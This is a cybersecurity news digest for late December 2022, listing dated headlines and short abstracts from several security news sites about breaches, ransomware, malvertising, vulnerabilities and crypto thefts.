December, 2022
December 31, 2022 – Breach
Personal health information of 42M Americans leaked between 2016 and 2021 Full Text
Abstract
Crooks have had access to the medical records of 42 million Americans since 2016 as the number of hacks on healthcare organizations doubled. Medical records of 42 million Americans are being sold on the dark web since 2016, this information comes...Security Affairs
December 31, 2022 – Phishing
Malvertising campaign MasquerAds abuses Google Ads Full Text
Abstract
Experts warn of a new Malvertising Campaign abusing Google Ads that targets users searching for popular software. Guardio Labs researchers uncovered a malvertising campaign, tracked as MasquerAds and attributed to a threat actor known as Vermux, that...Security Affairs
December 30, 2022 – Criminals
Multiple Malware For Sale on Darkweb Forums Full Text
Abstract
Researchers have spotted a new threat group, dubbed PureCoder, selling multiple malware, including miners, information stealers, and crypters, on the dark web. Recently, Italian cyber security agency TG Soft identified that the PureLogs information stealer was used by Alibaba2044 threat actors ... Read MoreCyware
December 30, 2022 – Malware
New Linux malware targets WordPress sites by exploiting 30 bugs Full Text
Abstract
A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScripts. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises...Security Affairs
December 30, 2022 – Attack
Royal ransomware Group Claims Attacking Iowa PBS station Full Text
Abstract
Two days after Iowa PBS became aware of the incident, several local news outlets reported it cut short its annual fall fundraising pledge drive due to a cyberattack. The Royal ransomware group took credit for the attack.Cyware
December 30, 2022 – Vulnerabilities
NETGEAR fixes a severe bug in its routers. Patch it asap! Full Text
Abstract
Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC. Netgear fixed a bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless...Security Affairs
December 30, 2022 – Cryptocurrency
Hackers Drain Cryptocurrency Worth Millions From Crypto-Wallets Full Text
Abstract
Security issues surrounding crypto wallets and the entire blockchain ecosystem have become prevalent. Several crypto platforms including BTC[.]com, 3Commas, and Bitkeep have been added to the long list of crypto-related hacks. Users are recommended to practice caution, refrain from clicking on ... Read MoreCyware
December 30, 2022 – Attack
Lockbit ransomware gang claims to have hacked the Port of Lisbon Full Text
Abstract
The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The...Security Affairs
December 30, 2022 – Malware
Google Ads Abused to Spread Malware Full Text
Abstract
Different malware operators are increasingly abusing the Google Ads platform to drop malware, including variants of Raccoon Stealer and the IcedID botnet. Threat actors clone the official websites of popular software to lure users into downloading their malicious versions.Cyware
December 30, 2022 – Government
CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added TIBCO Software's JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog. US CISA added TIBCO Software's JasperReports vulnerabilities, tracked as CVE-2018-5430 (CVSS score: 7.7) and CVE-2018-18809 (CVSS...Security Affairs
December 30, 2022 – Attack
Toy Maker Jakks Pacific Reports Cyberattack Full Text
Abstract
The firm – which is one of the biggest toy companies in the world thanks to licensing deals with Disney and Nintendo – hired cybersecurity experts to deal with the incident and restore their servers.Cyware
December 30, 2022 – Outage
Port of Lisbon Website Still Down as LockBit Gang Claims Cyberattack Full Text
Abstract
The Administration of the Port of Lisbon (APL) is working permanently and closely with all the competent authorities, in order to guarantee the security of the systems and respective data.Cyware
December 30, 2022 – Vulnerabilities
CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
CVE-2018-5430 resides in TIBCO JasperReports Server that may allow someone read-only access to the contents of the web application. CVE-2018-18809 in TIBCO JasperReports Library contains a directory-traversal vulnerability.Cyware
December 29, 2022 – General
Large-Volume DDoS Attacks Increases by 81% in 2022 Full Text
Abstract
Imperva’s report on the DDoS threat landscape mentions that the largest DDoS attack in 2022 was 4.5x larger than the biggest attack observed in 2021. The large-volume DDoS attacks per month also saw an 81% jump from the last year. The rise in geopolitical conflict also led to an increase in hacktiv ... Read MoreCyware
December 29, 2022 – Vulnerabilities
Thousands of Citrix servers still vulnerable to CVE-2022-27510 and CVE-2022-27518 Full Text
Abstract
Researchers warn of thousands of Citrix Application Delivery Controller (ADC) and Gateway endpoints are still unpatched. NCC Group's Fox-IT research team warns of thousands of Citrix ADC and Gateway endpoints remain vulnerable to two critical vulnerabilities,...Security Affairs
December 29, 2022 – Attack
EarSpy Attack Eavesdrops Using Motion Sensors Full Text
Abstract
Academic researchers from five American universities discovered a new attack method called EarSpy that can be used to eavesdrop on Android phones via motion sensors. According to experts, one way to reduce the efficacy of the EarSpy attack is to set the volume lower for the ear speakers.Cyware
December 29, 2022 – Attack
LCMHS hospital suffered a Ransomware attack at Louisiana hospital that impacted 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) suffered a ransomware attack that impacted 270,000 patients. The Lake Charles Memorial Health System (LCMHS) disclosed a data breach that affected almost 270,000 patients at its medical centers. The Lake...Security Affairs
December 29, 2022 – Government
Govt of India Issues Advisory Against Potential Phishing Attacks Full Text
Abstract
The Computer Emergency Response Team (CERT-In) issued an advisory in the wake of this data breach. It warned Indian users that their accounts could be compromised due to the phishing attacks that cybercriminals undertake.Cyware
December 29, 2022 – Attack
Lake Charles Memorial Hospital Suffered a Ransomware Attack Full Text
Abstract
Hive group laid bare the files that were allegedly stolen after breaking into LCMHS systems. Bills of materials, cards, contracts, medical information, papers, medical records, scans, residents, and other documents are among the files listed.Cyware
December 29, 2022 – Government
Lawmakers Signal Inquiries Into U.S. Government’s Use of Foreign Spyware Full Text
Abstract
Countries globally have embraced commercial spyware for the new powers of surveillance it gives them. The Israeli firm NSO held a near monopoly in the industry for nearly a decade, selling Pegasus to Mexico, Saudi Arabia, India, and other nations.Cyware
December 29, 2022 – Malware
Lazarus’s Subgroup BlueNoroff Adopts New Malware Delivery Method Full Text
Abstract
The financially motivated BlueNoroff group was found using a new malware strain to target financial institutions in Japan. The gang has also devised a new tactic to evade Mark-of-the-Web (MotW) security measures. Kaspersky researchers discovered more than 70 domains used by BlueNoroff. These ... Read MoreCyware
December 29, 2022 – Vulnerabilities
WordPress Vulnerability & Patch Roundup December 2022 Full Text
Abstract
To help educate website owners on emerging threats to their environments, researchers at Sucuri compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.Cyware
December 29, 2022 – Malware
GuLoader Uses New Anti-Analysis Techniques to Evade Security Software Full Text
Abstract
GuLoader has been updated with new anti-evasion techniques to dodge traditional security solutions. The new version is also hostile to systems running virtual machines. The malware scans entire process memory for any virtual machine-related strings to thwart researchers and hostile virtualized env ... Read MoreCyware
December 28, 2022 – Hacker
Hackers abuse Google Ads to spread malware in legit software Full Text
Abstract
Malware operators have been increasingly abusing the Google Ads platform to spread malware to unsuspecting users searching for popular software products.BleepingComputer
December 28, 2022 – Government
UAE Panel on Cybersecurity Warns Against Cyberattacks During New Year Celebrations Full Text
Abstract
The council then pointed out that many countries have witnessed the rapid digital transformation in services and daily transactions, which has increased the risks posed by cyberattacks against various sectors, including electricity, gas, and water.Cyware
December 28, 2022 – Breach
Crypto wallet BitKeep lost over $9M over a cyber attack Full Text
Abstract
Decentralized multi-chain crypto wallet BitKeep lost over $9 Million worth of digital currencies after a cyber attack. BitKeep was the victim of a supply chain attack that resulted in the theft of over $9 Million worth of digital currencies from its customers....Security Affairs
December 28, 2022 – Attack
Royal ransomware claims attack on Intrado telecom provider Full Text
Abstract
The Royal Ransomware gang claimed responsibility for a cyber attack against telecommunications company Intrado on Tuesday.BleepingComputer
December 28, 2022 – Denial Of Service
81% Increase in Large-Volume DDoS Attacks Full Text
Abstract
DDoS attacks, although frequent, are generally low volume, with the average DDoS attack reaching only 240,000 RPS. Large-volume attacks make up less than 1% of total DDoS.Cyware
December 28, 2022 – General
Zurich chief warned that cyber attacks will become uninsurable Full Text
Abstract
The chief executive of insurance giant Zurich warns that cyber attacks, rather than natural catastrophes, will become uninsurable. Mario Greco, chief executive of insurer giant Zurich, has warned that cyber attacks will become soon “uninsurable.” The...Security Affairs
December 28, 2022 – Vulnerabilities
Thousands of Citrix servers vulnerable to patched critical flaws Full Text
Abstract
Thousands of Citrix ADC and Gateway deployments remain vulnerable to two critical-severity security issues that the vendor fixed in recent months.BleepingComputer
December 28, 2022 – Criminals
30 Million Railway Customers’ Data for Sale On the Dark Web Full Text
Abstract
Username, email, verified and verified mobile numbers, gender, city Id, City Name, state Id, and language preferences are among the data. Sample data by actor includes a number of records containing emails and phone numbers.Cyware
December 28, 2022 – Attack
Ransomware attack at Louisiana hospital impacts 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) is sending out notices of a data breach affecting almost 270,000 people who have received care at one of its medical centers.BleepingComputer
December 28, 2022 – Attack
Defrost Finance Breaks Silence on ‘Exit Scam’ Accusations, Denies Rug Pull Full Text
Abstract
On Dec. 23, the platform announced it suffered a flash loan attack, leading to the draining of user funds from its v2 protocol. One day later, another incident saw a hacker steal the admin key for a second “much larger” attack on the v1 protocol.Cyware
December 28, 2022 – Cryptocurrency
Cryptocurrency Exchange BTC.com Suffers Massive Cyber Attack Full Text
Abstract
During the attack, BTC.com lost about $700,000 worth of crypto owned by its clients and $2.3 million in digital assets owned by the company. The company has recovered some of the stolen cryptocurrency despite not disclosing the amount.Cyware
December 28, 2022 – Criminals
Hackers Steal Power Utility Customer Data Full Text
Abstract
A law firm handling breach notification for Sargent & Lundy estimates the hackers stole the personal data of more than 6,900 individuals. The Black Basta ransomware gang surfaced in April 2022. The group is known for using double-extortion tactics.Cyware
December 28, 2022 – Breach
Cybersecurity Firm Links Piers Morgan Twitter Hack to Leak of 400m Records Full Text
Abstract
The hacker claimed the data had been “scraped” from Twitter via a “vulnerability” in the site, and “includes emails and phone numbers of celebrities, politicians, companies, normal users, and a lot of OG and special usernames.Cyware
December 28, 2022 – General
Reported phishing attacks have quintupled Full Text
Abstract
The rise in Q3 2022 was attributable, in part, to increasing numbers of attacks reported against several specific targeted brands. These target companies and their customers suffered from large numbers of attacks from persistent phishers.Cyware
December 28, 2022 – Hacker
Hackers Target WordPress Gift Card Plugin to Upload Backdoors Full Text
Abstract
A critical vulnerability in the WordPress plugin YITH WooCommerce Gift Cards, which has over 50,000 worldwide installations. The bug, tracked as CVE-2022-45359, is being actively abused by threat actors. An unauthenticated hacker can upload files to vulnerable sites, completely taking over a compro ... Read MoreCyware
December 27, 2022 – Cryptocurrency
BTC.com lost $3 million worth of cryptocurrency in cyberattack Full Text
Abstract
BTC.com, one of the world's largest cryptocurrency mining pools, announced it was the victim of a cyberattack that resulted in the theft of approximately $3 million worth of crypto assets belonging to both customers and the company.BleepingComputer
December 27, 2022 – APT
Lazarus APT Uses Phishing Domains to Target NFT Investors Full Text
Abstract
Lazarus Group is believed to be behind a massive phishing campaign targeting NFT investors via nearly 500 phishing domains. They use fake bait websites to offer malicious Mints. The attack begins by sending out spam emails laden with links to legitimate-looking phishing pages that look legitimate.Cyware
December 27, 2022 – Criminals
Hackers stole $3 million worth of cryptocurrency from BTC.com Full Text
Abstract
The BTC.com cryptocurrency platform was the victim of a cyberattack that resulted in the theft of $3 million worth of crypto assets. BTC.com is a website that provides services for managing and transferring Bitcoin, it offers a digital wallet for storing...Security Affairs
December 27, 2022 – Criminals
Hackers steal $8 million from users running trojanized BitKeep apps Full Text
Abstract
Multiple BitKeep crypto wallet users reported that their wallets were emptied during Christmas after hackers triggered transactions that didn't require verification.BleepingComputer
December 27, 2022 – Malware
Malware Disguised as YouTube Bot Steals Sensitive Data Full Text
Abstract
Threat actors are distributing a new YouTube bot malware that can artificially boost the rankings of videos on YouTube and steal sensitive information from browsers. Upon execution, the malware performs an AntiVM check to prevent malware detection and analysis by researchers in a virtual envi ... Read MoreCyware
December 27, 2022 – Policy and Law
Facebook (Meta) to settle Cambridge Analytica data leak for $725M Full Text
Abstract
Facebook (Meta) has agreed to pay $725 million to settle the class-action lawsuit filed in 2018 over the Cambridge Analytica data leak. Facebook (Meta) has agreed to pay $725 million to settle a class-action lawsuit filed in 2018 over the Cambridge...Security Affairs
December 27, 2022 – Attack
EarSpy attack eavesdrops on Android phones via motion sensors Full Text
Abstract
A team of researchers has developed an eavesdropping attack for Android devices that can, to various degrees, recognize the caller's gender and identity, and even discern private speech.BleepingComputer
December 27, 2022 – Vulnerabilities
Backdoor Credential Found in ZyXEL Router Full Text
Abstract
Cybersecurity researcher RE-Solver claimed to have found hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers. The bug he exploited is a Telnet backdoor in D-Link DWR-921 that is also present in the ZyXEL LTE3301-M209.Cyware
December 27, 2022 – Business
Facebook (Meta) to settle Cambridge Analytica data leak for $725M Full Text
Abstract
Facebook (Meta) has agreed to pay $725 million to settle the class-action lawsuit filed in 2018 over the Cambridge Analytica data leak. Facebook (Meta) has agreed to pay $725 million to settle a class-action lawsuit filed in 2018 over the Cambridge...Security Affairs
December 27, 2022 – Hacker
BlueNoroff Introduces New Methods Bypassing MoTW Full Text
Abstract
BlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures. It expanded file types and tweaked infection methods and, created numerous fake domains impersonating venture capital companies and banks.Cyware
December 27, 2022 – Malware
Uncovering the link between PrivateLoader PPI service and RisePro stealer Full Text
Abstract
The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the RisePro info-stealing malware. The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the information-stealing...Security Affairs
December 27, 2022 – Criminals
North Korean Hackers Steal NFTs via Phishing Websites Full Text
Abstract
The attackers set up nearly 500 decoy sites, including that of a project associated with the World Cup, and NFT marketplaces OpenSea, X2Y2 and Rarible. They made off with $365,000 by stealing 1,055 NFTs with just one of those phishing addresses.Cyware
December 27, 2022 – Phishing
Crooks impersonate brands using search engine advertisement services Full Text
Abstract
The FBI warns of cybercriminals using search engine advertisement services to impersonate brands and defraud users The FBI is warning of cyber criminals using search engine advertisement services to impersonate brands and direct users to websites...Security Affairs
December 27, 2022 – General
Modern technology and cyber recovery will intersect in the next generation of attacks Full Text
Abstract
While embarking on a virtual life journey is appealing to many, it has vulnerabilities. As the metaverse continues to gain momentum, phishing attempts, NFT-related scams and malware attacks have already begun.Cyware
December 27, 2022 – Vulnerabilities
XLL Files Increasingly Getting Abused by Attackers Full Text
Abstract
In the wake of Microsoft's effort to phase out support for VBA macros in Office docs, cybercriminals have now turned to use XLL files to embed malicious code in docs. FIN7, an infamous cybercrime threat actor, started using XLL files as attachments in email campaigns early this year. Additiona ... Read MoreCyware
December 26, 2022 – Malware
GuLoader implements new evasion techniques Full Text
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers d a detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka...Security Affairs
December 26, 2022 – Criminals
Hacker claims to be selling Twitter data of 400 million users Full Text
Abstract
A threat actor claims to be selling public and private data of 400 million Twitter users scraped in 2021 using a now-fixed API vulnerability. They're asking $200,000 for an exclusive sale.BleepingComputer
December 26, 2022 – Criminals
Hackers Drain $8M in Assets from Bitkeep Wallets in Latest DeFi Exploit Full Text
Abstract
One suspected hacker wallet address already has more than $5 million in digital assets. While the amount exploited is still not final and the attackers are still currently transferring funds to multiple wallet addresses.Cyware
December 26, 2022 – Malware
GuLoader implements new evasion techniques Full Text
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers d a detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka...Security Affairs
December 26, 2022 – Breach
Cincinnati State Data Breach Possibly Exposed Social Security Numbers, Other Information Full Text
Abstract
The data included full names, addresses, dates of birth, Social Security numbers, driver’s licenses or state identification numbers, health insurance information, and financial account information, the notice states.Cyware
December 26, 2022 – Breach
Attackers Bypass 2FA, Takeover Xfinity and other Accounts Full Text
Abstract
A number of Comcast Xfinity customers reported their accounts being hacked despite two-factor authentication being enabled on their accounts. According to a researcher, hackers attempted credential-stuffing attacks on users’ accounts. Criminals also tried to break into victims’ DropBox, Evernote, a ... Read MoreCyware
December 26, 2022 – Hacker
IcedID Operators Abuse Google Ads in Malvertising Campaign Full Text
Abstract
Trend Micro noted a new distribution trend for the IcedID botnet via Google pay-per-click (PPC) ads, aka malvertising. The adversaries behind IcedID malware erected fake websites of legitimate organizations and well-known applications to lure online users. Attackers also drop a new loader via an MS ... Read MoreCyware
December 26, 2022 – Attack
Labour Attacks Delays to Online Safety Bill as it Highlights Christmas Scams Full Text
Abstract
The bill has been hit by repeated delays and amendments. It has since been held up while ministers re-wrote parts of it, given a row among Conservative MPs that it would unfairly stifle freedom of speech online.Cyware
December 26, 2022 – Vulnerabilities
Critical Linux Kernel Flaw Affects SMB Servers with KSMBD Enabled Full Text
Abstract
The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the kernel.Cyware
December 26, 2022 – Breach
Hacker Claims to Have Scraped 400 Million Twitter User Records Full Text
Abstract
The posting, apparently first noticed by Israeli cyber intelligence firm Hudson Rock, includes alleged private email addresses for three dozen well-known personalities including New York Democratic Rep.Cyware
December 25, 2022 – Criminals
Vice Society Adds Custom-branded Payload PolyVice to its Arsenal Full Text
Abstract
The Vice Society ransomware group spun another custom ransomware variant, dubbed PolyVice. The strain deploys a robust encryption scheme that uses NTRUEncrypt and ChaCha20-Poly1305 algorithms. The authors of this new ransomware variant are also likely selling similar payloads to other hacking group ... Read MoreCyware
December 25, 2022 – Vulnerabilities
Critical Linux Kernel flaw affects SMB servers with ksmbd enabled Full Text
Abstract
Experts warn of a critical Linux Kernel vulnerability (CVSS score of 10) impacting SMB servers that can lead to remote code execution. A critical Linux kernel vulnerability (CVSS score of 10) exposes SMB servers with ksmbd enabled to hack. KSMBD is a Linux...Security Affairs
December 25, 2022 – Vulnerabilities
Experts warn of attacks exploiting WordPress gift card plugin Full Text
Abstract
Threat actors are actively exploiting a critical flaw in the YITH WooCommerce Gift Cards Premium WordPress plugin installed by over 50,000 websites. Hackers are actively exploiting a critical vulnerability, tracked as CVE-2022-45359 (CVSS v3: 9.8),...Security Affairs
December 25, 2022 – Breach
Data of 400 Million Twitter users up for sale Full Text
Abstract
A threat actor is claiming they have obtained data of 400,000,000 Twitter users and is offering it for sale. A threat actor claims they have obtained data of 400,000,000 Twitter users and is attempting to sell it. The seller claims the database...Security Affairs
December 25, 2022 – General
Security Affairs newsletter Round 399 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Expert...Security Affairs
December 25, 2022 – Policy and Law
Microsoft fined €60 million in France for using advertising cookies without consent Full Text
Abstract
France's privacy watchdog fines €60 million Microsoft for using advertising cookies without explicit customer consent. France's privacy watchdog fines €60 million Microsoft's Ireland subsidiary for using advertising cookies without the explicit...Security Affairs
December 24, 2022 – Malware
New info-stealer malware infects software pirates via fake cracks sites Full Text
Abstract
A new information-stealing malware named 'RisePro' is being distributed through fake cracks sites operated by the PrivateLoader pay-per-install (PPI) malware distribution service.BleepingComputer
December 24, 2022 – Vulnerabilities
Container Verification Bug Allows Malicious Images to Cloud Up Kubernetes Full Text
Abstract
A high-severity security vulnerability in the Kyverno admission controller for container images could allow malicious actors to import a raft of nefarious code into cloud production environments.Cyware
December 24, 2022 – Vulnerabilities
Expert found Backdoor credentials in ZyXEL LTE3301 M209 Full Text
Abstract
The cybersecurity researcher RE-Solver discovered Backdoor credentials in ZyXEL LTE3301-M209 LTE indoor routers. Security researcher ReSolver announced the discovery of hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers. In...Security Affairs
December 24, 2022 – Malware
Raspberry Robin malware used in attacks against Telecom and Governments Full Text
Abstract
The Raspberry Robin worm attacks aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government...Security Affairs
December 23, 2022 – Ransomware
The Week in Ransomware - December 23rd 2022 - Targeting Microsoft Exchange Full Text
Abstract
Reports this week illustrate how threat actors consider Microsoft Exchange as a prime target for gaining initial access to corporate networks to steal data and deploy ransomware.BleepingComputer
December 23, 2022 – Attack
New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government Full Text
Abstract
The new malicious campaign from STEPPY#KAVACH observed over the past few weeks appears to share many common TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to Pakistan by some researchers.Cyware
December 23, 2022 – Privacy
TikTok parent company ByteDance revealed the use of TikTok data to track journalists Full Text
Abstract
ByteDance admitted that its employees accessed TikTok data to track journalists to identify the source of leaks to the media. TikTok parent company ByteDance revealed that several employees accessed the TikTok data of two journalists to investigate...Security Affairs
December 23, 2022 – Vulnerabilities
Hackers exploit bug in WordPress gift card plugin with 50K installs Full Text
Abstract
Hackers are actively targeting a critical flaw in YITH WooCommerce Gift Cards Premium, a WordPress plugin used on over 50,000 websites.BleepingComputer
December 23, 2022 – Botnet
IcedID Botnet Distributors Abuse Google PPC to Distribute Malware Full Text
Abstract
Trend Micro researchers say that malicious actors are using malvertising to distribute the IcedID malware via cloned webpages of legitimate organizations and well-known applications.Cyware
December 23, 2022 – Breach
BetMGM discloses security breach impacting 1.5 Million customers Full Text
Abstract
Online sports betting company BetMGM suffered a data breach and threat actors offered for sale a database containing the data of 1.5 million customers. On December 21, the online sports betting company BetMGM disclosed a data breach while threat actors...Security Affairs
December 23, 2022 – Breach
Massive Twitter data leak investigated by EU privacy watchdog Full Text
Abstract
The Irish Data Protection Commission (DPC) has launched an inquiry following last month's news reports of a massive Twitter data leak.BleepingComputer
December 23, 2022 – Vulnerabilities
Zoom Whiteboard patches XSS bug Full Text
Abstract
Zoom has patched a cross-site scripting (XSS) bug that worked in both the desktop and web versions of its Whiteboard app. The XSS bug in Zoom Whiteboard was discovered by security researcher Eugene Lim (aka ‘spaceraccoon’).Cyware
December 23, 2022 – Attack
An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it Full Text
Abstract
An Iranian group hacked dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time. An Iranian group of hackers, known as Moses Staff, had seized control of dozens of Israeli CCTV cameras, the hack was known to the authorities...Security Affairs
December 23, 2022 – Vulnerabilities
Ghost CMS vulnerable to critical authentication bypass flaw Full Text
Abstract
A critical vulnerability in the Ghost CMS newsletter subscription system could allow external users to create newsletters or modify existing ones so that they contain malicious JavaScript.BleepingComputer
December 23, 2022 – General
Dealing with cloud security shortfalls Full Text
Abstract
72% of IT leaders believe their companies moved to the cloud without properly understanding the skills, maturity curve, and complexities of making it all work securely, according to a recent CloudBolt Software report.Cyware
December 23, 2022 – Breach
LastPass revealed that encrypted password vaults were stolen Full Text
Abstract
The data breach suffered by LastPass in August 2022 may have been more severe than previously thought. In August password management software firm LastPass disclosed a security breach, threat actors had access to portions of the company development...Security Affairs
December 23, 2022 – General
Why Security Teams Shouldn’t Snooze on MFA Fatigue Full Text
Abstract
While security teams may be hasty to pile on every additional security measure in existence to supplement MFA, they must not compromise too heavily on convenience. It's a delicate balance and a difficult one to strike.Cyware
December 23, 2022 – Breach
Morley Companies data breach $4.3M class action settlement Full Text
Abstract
The settlement class, which has been directly notified of the settlement, is defined as U.S. residents whose data was compromised during the data incident the defendant announced on or about August 1, 2021.Cyware
December 23, 2022 – Breach
Fertility Centers of Illinois data breach $450K class action settlement Full Text
Abstract
Consumers affected by a data breach in February 2021 filed a class action lawsuit against FCI, arguing that the company should have protected their information through reasonable cybersecurity measures.Cyware
December 23, 2022 – Criminals
Vice Society Group May Have Outsourced the Development of ‘PolyVice’ Ransomware Full Text
Abstract
Researchers say it's likely that the group behind the custom-branded PolyVice ransomware for Vice Society is also selling similar payloads to other groups. It implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.Cyware
December 22, 2022 – Breach
Leading sports betting firm BetMGM discloses data breach Full Text
Abstract
Leading sports betting company BetMGM disclosed a data breach after a threat actor stole personal information belonging to an undisclosed number of customers.BleepingComputer
December 22, 2022 – Malware
Beyond ProxyNotShell - New OWASSRF Exploit Targets MS Exchange Full Text
Abstract
Security analysts at CrowdStrike reported a new exploit method called OWASSRF that requires a hacker to abuse ProxyNotShell flaws (CVE-2022-41080 and CVE-2022-41082) in Microsoft Exchange servers. Through this, an attacker can pull off RCE attacks via Outlook Web Access (OWA). A deeper study into i ... Read MoreCyware
December 22, 2022 – Criminals
Vice Society ransomware gang is using a custom locker Full Text
Abstract
The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements...Security Affairs
December 22, 2022 – Breach
Lastpass: Hackers stole customer vault data in cloud storage breach Full Text
Abstract
LastPass revealed today that attackers stole customer vault data after breaching its cloud storage earlier this year using information stolen during an August 2022 incident.BleepingComputer
December 22, 2022 – General
Over 50 New CVE Numbering Authorities Announced in 2022 Full Text
Abstract
Most CNAs can assign CVE identifiers to vulnerabilities found in their own products, but some can also assign CVEs to flaws found by their researchers in third-party software that is not in another CNA’s scope.Cyware
December 22, 2022 – Botnet
A new Zerobot variant spreads by exploiting Apache flaws Full Text
Abstract
Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved...Security Affairs
December 22, 2022 – General
DuckDuckGo now blocks Google sign-in pop-ups on all sites Full Text
Abstract
DuckDuckGo apps and extensions are now blocking Google Sign-in pop-ups on all its apps and browser extensions, removing what it perceives as an annoyance and a privacy risk for its users.BleepingComputer
December 22, 2022 – Attack
Stolen certificates in two waves of ransomware and wiper attacks Full Text
Abstract
The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.Cyware
December 22, 2022 – Criminals
North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text
Abstract
North Korea-linked threat actors have stolen an estimated $1.2 billion worth of cryptocurrency and other virtual assets in the past five years. South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat...Security Affairs
December 22, 2022 – Attack
Comcast Xfinity accounts hacked in widespread 2FA bypass attacks Full Text
Abstract
Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges.BleepingComputer
December 22, 2022 – Breach
Shoemaker Ecco Leaks Over 60GB of Sensitive Data for 500+ Days Full Text
Abstract
Not only could anyone have modified the data, but the server misconfiguration’s severity likely left the company open to an attack that could have affected customers all over the world.Cyware
December 22, 2022 – Ransomware
Vice Society ransomware gang switches to new custom encryptor Full Text
Abstract
The Vice Society ransomware operation has switched to using a custom ransomware encrypt that implements a strong, hybrid encryption scheme based on NTRUEncrypt and ChaCha20-Poly1305.BleepingComputer
December 22, 2022 – General
North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text
Abstract
South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat actors have stolen an estimated 1.5 trillion won ($1.2 billion) in cryptocurrency and other virtual assets in the past five years.Cyware
December 22, 2022 – Solution
Brave launches FrodoPIR, a privacy-focused database query system Full Text
Abstract
Brave Software developers have created a new privacy-centric database query system called FrodoPIR that retrieves data from servers without disclosing the content of user queries.BleepingComputer
December 22, 2022 – Government
France Seeks to Protect Hospitals After Series of Cyberattacks Full Text
Abstract
"The target is that 100 percent of the most important health facilities have undergone these new exercises by May 2023," the interior, health, and digital services ministers announced in a joint statement.Cyware
December 22, 2022 – Hacker
FIN7 hackers create auto-attack platform to breach Exchange servers Full Text
Abstract
The notorious FIN7 hacking group uses an auto-attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size.BleepingComputer
December 22, 2022 – Breach
Sports betting operator BetMGM hit by data breach Full Text
Abstract
The issue affected customer information such as name, contact information, date of birth, hashed Social Security number, account identifiers and information related to transactions with BetMGM, the company said.Cyware
December 22, 2022 – Vulnerabilities
Microsoft gives final warning about Basic Auth deprecation in Exchange Online Full Text
Abstract
Organizations will still be informed seven days before the protocol is disabled for them. Once it is turned off, affected apps will throw an HTTP error 401 for bad username/password. The only way for them to work will be to switch to Modern Auth.Cyware
December 22, 2022 – Hacker
XLLing in Excel - threat actors using malicious add-ins Full Text
Abstract
Cisco Talos highlights a new vector for malicious code to Microsoft Excel—malicious add-ins, specifically XLL files. Although XLL files were supported since early Excel versions of Excel, malicious actors started using them relatively recently.Cyware
December 21, 2022 – Vulnerabilities
Corsair keyboard bug makes it type on its own, no malware involved Full Text
Abstract
Corsair has confirmed that a bug in the firmware of K100 keyboards, and not malware, is behind previously entered text being auto-typed into applications days later.BleepingComputer
December 21, 2022 – Malware
Info-stealers Used to Target Ukraine’s Military Systems Full Text
Abstract
Ukraine’s DELTA military system users were the target of a phishing attack that distributed infostealers identified as FateGrab and StealDeal. Email and instant messages with fake warnings to update the Delta certificates were used to lure victims. Upon execution, StealDeal and FateGrab malware wo ... Read MoreCyware
December 21, 2022 – Ransomware
Play ransomware attacks use a new exploit to bypass ProxyNotShell mitigations on Exchange servers Full Text
Abstract
Play ransomware attacks target Exchange servers with a new exploit that bypasses Microsoft’s ProxyNotShell mitigations. Play ransomware operators target Exchange servers using a new exploit chain, dubbed OWASSRF by Crowdstrike, that bypasses Microsoft’s...Security Affairs
December 21, 2022 – Malware
Zerobot malware now spreads by exploiting Apache vulnerabilities Full Text
Abstract
